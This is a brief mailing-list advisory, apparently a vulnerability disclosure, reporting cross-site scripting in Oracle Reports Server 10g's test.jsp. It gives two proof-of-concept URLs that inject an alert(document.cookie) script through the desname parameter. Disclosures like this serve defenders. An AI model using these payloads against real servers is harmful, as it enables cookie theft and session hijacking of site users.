Oracle Reports Server 10g Vulnerable to XSS

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 


Oracle Reports Server 10g (9.0.4.3.3) Vulnerable to Cross Site Scripting


#####################

http://paolo/reports/examples/Tools/test.jsp?repprod&desname='<script>alert(document.cookie);</script>

http://paolo/reports/examples/Tools/test.jsp?repprod"<script>alert(document.cookie);</script>

#####################
 
Paolo sends GREETS to Oracle secalert



Paolo
[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux